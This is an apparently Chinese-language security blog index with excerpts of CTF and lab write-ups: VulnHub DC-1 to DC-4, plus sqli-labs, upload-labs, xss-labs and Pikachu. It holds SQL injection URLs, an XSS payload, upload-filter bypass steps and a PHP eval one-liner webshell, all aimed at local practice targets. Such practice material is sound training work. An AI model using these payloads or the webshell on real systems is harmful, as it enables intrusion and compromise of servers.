Putdownd’s Blog

靶场信息 Name: DC: 4 Date release: 7 Apr 2019 Author: DCAU Series: DC Web page: http://www.five86.com/dc-4.html 描述DC-4 是另一个特意建造的易受攻击的实验室，旨在获得渗透测试领域的经验。 与之前的 DC 版本不同，这个版本主要是为初学者/中级者设计的。只有一个标志，但从技术上讲，有多个入口点，就像上次一样，没有线索。 必须具备 Linux 技能和熟悉 Linux 命令行，以及一些基本渗透测试工具的经验。 对于初学者来说，谷歌可以提供很大的帮助，但你可以随时在@DCAU7 上给我发推文，寻求帮助，让你重新开始。但请注意：我不会给你答案，相反，我会给你一个关于如何前进的想法。 技术信息DC-4 是基于 Debian 32 位构建的 VirtualBox VM，因此在大多数 PC 上运行它应该没有问题。 如果在 VMware 中运行此 VM 有任何问题，请通读此内容。 它当前配置为桥接网络，但是，可以根据您的要求进行更改。网络配置为 DHCP。 安装很简单 - 下载它...

靶场介绍 Name: DC: 3.2 Date release: 25 Apr 2020 Author: DCAU Series: DC Web page: http://www.five86.com/dc-3.html 描述DC-3 是另一个特意建造的易受攻击的实验室，旨在获得渗透测试领域的经验。 与之前的 DC 版本一样，这个版本是为初学者设计的，虽然这一次，只有一个标志，一个入口点，根本没有任何线索。 必须具备 Linux 技能和熟悉 Linux 命令行，以及一些基本渗透测试工具的经验。 对于初学者来说，谷歌可以提供很大的帮助，但你可以随时在@DCAU7 上给我发推文，寻求帮助，让你重新开始。但请注意：我不会给你答案，相反，我会给你一个关于如何前进的想法。 对于那些有 CTF 和 Boot2Root 挑战经验的人来说，这可能不会花你很长时间（事实上，它可能会花费你不到 20 分钟的时间）。 如果是这种情况，并且如果您希望它更具挑战性，您可以随时重做挑战并探索其他获得根和获得旗帜的方法。 技术信息DC-3 是基于 Ubuntu 32 位构建的 VirtualBox VM，因...

靶场介绍 Name: DC: 2 Date release: 22 Mar 2019 Author: DCAU Series: DC Web page: http://www.five86.com/dc-2.html 描述与 DC-1 非常相似，DC-2 是另一个专门构建的易受攻击的实验室，目的是获得渗透测试领域的经验。 与最初的 DC-1 一样，它的设计考虑到了初学者。 必须具备 Linux 技能和熟悉 Linux 命令行，以及一些基本渗透测试工具的经验。 就像 DC-1 一样，有五个标志，包括最终标志。 再说一次，就像 DC-1 一样，标志对初学者很重要，但对有经验的人来说并不那么重要。 简而言之，唯一真正重要的标志是最终标志。 对于初学者来说，谷歌是你的朋友。好吧，除了所有的隐私问题等等等等。 我还没有探索实现 root 的所有方法，因为我放弃了我一直在研究的以前的版本，并从基本操作系统安装之外完全重新开始。 技术信息DC-2 是基于 Debian 32 位构建的 VirtualBox VM，因此在大多数 PC 上运行它应该没有问题。 虽然我没有在 VMware 环境中测...

靶场介绍Name: DC: 1Date release: 28 Feb 2019Author: DCAUSeries: DCWeb page: http://www.five86.com/dc-1.html 描述DC-1 是一个专门建造的易受攻击的实验室，旨在获得渗透测试领域的经验。 它旨在为初学者带来挑战，但它的简单程度取决于您的技能和知识以及您的学习能力。 要成功完成这一挑战，您将需要 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验，例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。 有多种获得 root 的方法，但是，我已经包含了一些包含初学者线索的标志。 总共有五个标志，但最终目标是在 root 的主目录中找到并读取标志。您甚至不需要成为 root 即可执行此操作，但是，您将需要 root 权限。 根据您的技能水平，您可能可以跳过查找大多数这些标志并直接获取根。 初学者可能会遇到他们以前从未遇到过的挑战，但谷歌搜索应该是获取完成这一挑战所需信息的全部内容。 技术信息DC-1 是基于 Debian 32 位构...

宽字节123456宽字节： GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节，实际上只有两字节。宽字节带来的安全问题主要是ASCII字符(一字节)的现象，即将两个ascii字符误认为是一个宽字节字符。 中文、韩文、日文等均存在宽字节，英文默认都是一个字节。在使用PHP连接MySQL的时候，当设置“set  character_set_client = gbk"时会导致一个编码转换的问题。例子： id= 1' 处理 1 \' 进行编码 1%5c%27 带入sql后 id = \'and XXXX 此时无法完成注入id=1%df' 处理 1%df\' 进行编码 1%df%5c%27 带入sql后 id =1運'and XXX 此时存在宽字节注入 Less-321234561. http://127.0.0.1/sqli/Less-32/?id=1 这个时候返回的是正常数据2. http://12...

Less-26a1234567891. http://127.0.0.1/sqli/Less-26a/?id=1 返回数据正常2. http://127.0.0.1/sqli/Less-26a/?id=1' 此时没有数据返回3. http://127.0.0.1/sqli/Less-26a/?id=1') ;%00此时我们可以得到返回正常的数据4. 代码中 //print_r(mysql_error()); 屏蔽了返回的错误，所以这里我们不能使用报错注入。我们使用联合查询注入5. http://127.0.0.1/sqli/Less-26a/?id=111') %a0 union %a0 select %a0 1,2,3;%00 直接将所有的空格替换为%a0,根据hint得到可以回显的位置。(特别感谢网络上无偿提供搭建环境的人，感谢您的帮助)6. http://127.0.0.1/sqli/Less-26a/?id=111') %a0 union %a0 select %a0 1,2,group_concat(schema_name)...

系统介绍12345678910111213141516171819Pikachu上的漏洞类型列表如下： Burt Force(暴力破解漏洞) XSS(跨站脚本漏洞) CSRF(跨站请求伪造) SQL-Inject(SQL注入漏洞) RCE(远程命令/代码执行) Files Inclusion(文件包含漏洞) Unsafe file downloads(不安全的文件下载) Unsafe file uploads(不安全的文件上传) Over Permisson(越权漏洞) ../../../(目录遍历) I can see your ABC(敏感信息泄露) PHP反序列化漏洞 XXE(XML External Entity attack) 不安全的URL重定向 SSRF(Server-Side Request Forgery) More...(找找看?..有彩蛋!) 管理工具里面提供了一个简易的xss管理后台,供你测试钓鱼和捞cookie~ 后续会持续更新一些新的漏洞进来,也...

靶场地址1https://github.com/c0ny1/upload-labs 一句话1<?php @eval($_POST[123]);?> WebShell连接工具中国蚁剑1https://github.com/AntSwordProject/antSword AntSword 加载器1https://github.com/AntSwordProject/AntSword-Loader 菜刀Pass-01 写一个一句话文件,后缀改成允许上传的文件类型 bp抓包,把后缀改成.php 蚁剑连接 Pass-02 新建后缀.php的文件 bp抓包 将Content-Type修改为允许上传的类型（image/jpeg、image/png、image/gif）三选一 Pass-03 黑名单验证 如果黑名单定义不完整的话是可以实现绕过的，用.phtml .phps .php5 .pht进行绕过。这里我们直接上传一个.php5文件 因为上传上去的文件名会改变，bp抓包数据包中有回显，所以我们还是可以访问的。 注意 要在apache的htt...

xss-labsxss-labs靶场的项目地址:https://github.com/do0dl3/xss-labs level 1payload： 1http://xss/level1.php?name=<Script>alert(1)</Script> level 2源码: 1234567891011121314151617181920212223242526<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><script>window.alert = function() { confirm("完成的不错！"); window.location.href="level3.php?writing=wait"; ...

参考crow: https://github.com/crow821/crowsec Less-23 源码中对于 --+ # 进行了过滤处理， 所以这里我们只能使用and 或者or语句进行闭合,在这里可以使用另外一种特殊的注释符;%00通过这个注释符可以判断列数 除了在url末尾将–+、# --+ #替换为 ;%00 其余的均和less01关相同。 第二种报错注入1http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(database())),1) or '1'='1 报错出数据库 1http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 2,1)),1) or '1'='1 查询所有的数据库，使用limit进行逐个查询。 后续...